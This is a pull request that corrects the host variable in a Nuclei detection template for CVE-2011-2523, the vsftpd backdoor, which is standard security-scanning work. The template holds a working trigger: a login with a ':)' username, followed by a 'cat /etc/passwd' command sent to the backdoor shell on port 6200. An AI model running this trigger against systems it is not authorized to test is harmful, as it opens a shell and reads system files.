### PR TITLE
Fix: CVE-2011-2523 forced target to be only ip instead of ip:port

### DIFF
--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -19,21 +19,20 @@ info:
   tags: cve,cve2011,network,vsftpd,ftp,backdoor
 
 variables:
-  cmd: "cat /etc/passwd"  # shows the the user and group names and numeric IDs
-
+  cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
 
 network:
   - inputs:
       - data: "USER letmein:)\r\nPASS please\r\n"
         read: 100
     host:
-      - "{{Hostname}}:21"
+      - "{{Host}}:21"
 
   - inputs:
       - data: "{{cmd}}\n"
         read: 100
     host:
-      - "{{Hostname}}:6200"
+      - "{{Host}}:6200"
 
     matchers:
       - type: regex


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
```shell
[WRN] Could not make network request for 192.168.106.5:22:21: could not connect to server request: could not connect to any address found for host
[WRN] Could not make network request for 192.168.106.5:22:6200: could not connect to server request: could not connect to any address found for host
```


- Fixed CVE-2011-2523
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)